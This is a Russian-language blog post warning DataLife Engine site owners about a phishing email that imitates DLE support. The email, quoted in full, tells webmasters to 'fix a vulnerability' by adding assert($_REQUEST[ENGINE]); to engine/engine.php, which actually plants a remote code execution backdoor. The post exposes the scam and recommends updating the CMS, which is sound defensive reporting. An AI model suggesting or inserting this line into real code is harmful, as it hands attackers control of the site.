Про социальные сети и сервисы:
Возможно, это заинтересует:


    Рекомендуем:
Недавно на сайте смотрели:


2 865

DLE: Сообщение с темой "Ваш сайт **** может быть взломан!"





DLE Сообщение с темой Несомненно, движок DataLife Engine является весьма популярным среди владельцев разнонаправленных Интернет-ресурсов. В последние годы внимание к нему становится все выше, выходят новые версии, дополнения и модули для ДЛЕ. Это все привлекает и нехороших людей, проще говоря - мошенников. С одним из таких случаев, недавно смогли столкнуться многие обладатели ресурсов на этой системе управления.




Ваш DLE-сайт может быть взломан



Наверняка, некоторые владельцы сайтов на популярной CMS DLE уже столкнулись с подобным сообщением на почту:

Здравствуйте, уважаемый клиент!

Благодарим Вас за использование на Вашем сайте ***** нашего ПО «CMS DataLife Engine - Система управления сайтами».

Уведомляем Вас о том, что силами наших специалистов на Вашем сайте была обнаружена критическая уязвимость, позволяющая злоумышленникам получить доступ к базе данных Вашего сайта из-за недостаточной фильтрации данных.

По нашим данным 60% сайтов, использующих «DataLife Engine», уязвимы и подвержены взлому посредством данной уязвимости. Именно по этой причине, мы приняли решение произвести рассылку администраторам уязвимых сайтов для того, чтобы они смогли оперативно обезопасить свои сайты от противоправных действий со стороны злоумышленников.

Для исправления уязвимости в текстовом редакторе откройте файл Вашего сайта: *****/engine/engine.php и в самое начало файла после строчки:

<?php

добавьте:

assert($_REQUEST[ENGINE]);

С уважением,
Служба поддержки «DataLife Engine»


Что делать вебмастеру?


Однако, в целях реальной безопасности Вашего сайта крайне не рекомендуется следовать совету из этого сообщения, так как ничего общего с разработчиками DLE оно не имеет и рассылается не ими, а злоумышленниками, которые постредством подобной манипуляции могут навредить (мягко говоря) работе ресурса. Так, используя полученную уязвимость, с помощью PHP-сценария может формироваться POST-пакет для последующей возможной отправки файла с некоторым PHP-кодом. Ну а дальше уже дело фантазии.

Кроме того, стоит иметь ввиду, что подобные сообщения отправляются посредством обратной связи на сайте и по адресам электронной почты, не имеющим никакого отношения к адресам, на которые зарегистрированы лицензионные копии ДЛЕ на сайте разработчика. При отправке письма используются проксовые айпи адреса, либо TOR.

Если у Вас все-таки возникли обоснованные сомнения по поводу безопасности Вашего сайта на ДЛЕ, то:

1. Если используется нулль-версия, рассмотрите вариант перехода на лицензию.

2. Если первый вариант не подходит, обновите вашу CMS DataLife Engine до последней актуальной версии. Разработчики постоянно занимаются модернизацией и усовершенствованием этого движка, в том числе и в плане безопасности.

3. Все выявленные уязвимости DLE и выпущенные баг-фиксы размещаются на странице официального сайта CMS DataLife Engine. Отслеживайте эту информацию именно там.


Будьте внимательны, чтобы лишний раз не давать возможностей для взлома Вашего сайта.

Теги: Ваш сайт может быть взломан

Добавить комментарий

Имя:*
E-Mail:
Комментарий:
Вопрос:
Сколько будет: 17 минус 7 ? Ответ цифрой.
Ответ:*
Введите то, что показано на изображении: *

Возможно, Вас заинтересуют похожие тематические статьи и рекомендации:

  • В Беларуси заблокирован один из популярнейший медийных ресурсов Хартия 97В Беларуси с 24 января 2018 года начал блокироваться один из популярнейших Интернет-ресурсов оппозиционного характера Хартия 97". Медийный проект занимал значительную нишу в белорусском сегменте
  • Важность контента для сайтаКогда веб-мастер создаёт свой сайт, его задачей становится раскрутка своего ресурса. Основой этого процесса является контент, или его содержимое – то, за чем и заходят на сайт посетители. Если
  • Детали создания главной страницы сайтаОформление главной страницы сайта – очень важная задача, правильное выполнение который сделает сайт более популярным и успешным. Рассмотрим, о чём важно помнить и каких распространённых ошибок стоит
  • Как выбрать хостинговую компанию для JoomlaНа сегодняшний день, существует большое количество хостинговых компаний, предлагающих хостинг для joomla. Поэтому, многие владельцы сайтов, сталкиваются с проблемой выбора хостинг - провайдера. Для
  • Как повысить посещаемость своего сайта?Всё чаще такой вопрос интересует пользователей Интернета, как это видно с помощью ресурсов поисковых систем. Всё чаще люди спрашивают «Как создать свой сайт», «Как повысить посещаемость» и так далее.
  • Почему стоит использовать CMS Joomla?Если вы планируете в скором времени создать свой сайт, но пока что совершенно не разбираетесь в программировании, то это не беда. На счастье вам и не только вам, одни из самых лучших разработчиков
  • Что такое «копипастный» сайт и «сапа-сайты»?В поисках видов заработка в интернете многие создают сайты и вкладывают в них силы, время, средства и душу. Такие веб-мастера зарабатывают, в конце концов, приличные деньги, если не сдаются. Однако
  • Обзор популярных конструкторов сайтов РунетаФункциональные возможности конструкторов сайтов давно сравнимы с полноценными CMS. Их основное отличие от последних – максимальная простота использования. Конечно, совместить такие качества
  • Способы монетизации сайтов-сателлитовСуществуют сателлиты, которые предназначены для заработка, или же поддерживающие основной проект. В случае, если Вы решили зарабатывать именно на сателлитах, Вам необходимо узнать, каким образом
  • "В Контакте" или "Одноклассники". Битва социальных сетейЗдравствуйте, дорогие читатели! В данной статье речь пойдет о двух самых крупнейших социальных сетях в России «В Контакте» и «Одноклассники». Как вы уже знаете, данные сети пользуются высоким спросом

Темы, отмеченные пользователями:

7 самых бесполезных переносных устройств-гаджетов
Среди переносных электронных устройств – т.н. гаджетов – из всех этих миллионов и миллиардов нужных и полезных «штучек» существует тонкая прослойка совершенно бесполезных устройств, которые могут пригодиться разве что для розыгрыша друга или тупого подарка на день рождения. Среди всей этой массы

Как включить и настроить iMessage на iPhone и iPad
iMessage – это услуга корпорации Apple для передачи моментальными сообщениями. В отличие от SMS, за информацию переданную iMessage не берется плата с юзера. С их помощью возможно переписываться со своими знакомыми, у каких есть хоть какое устройство от знаменитой компании Apple. Для передачи

Nexus 6: новый флагман Google
Как-то скромненько и, можно сказать, втихую прошла недавно презентация нового флагманского смартфона от Google – модели Nexus 6. Как и предполагалось ранее, Nexus 6 собирала компания Motorola и поэтому стали ясны проявления дизайна смартфонов компании в новом творении для Google. С первого взгляда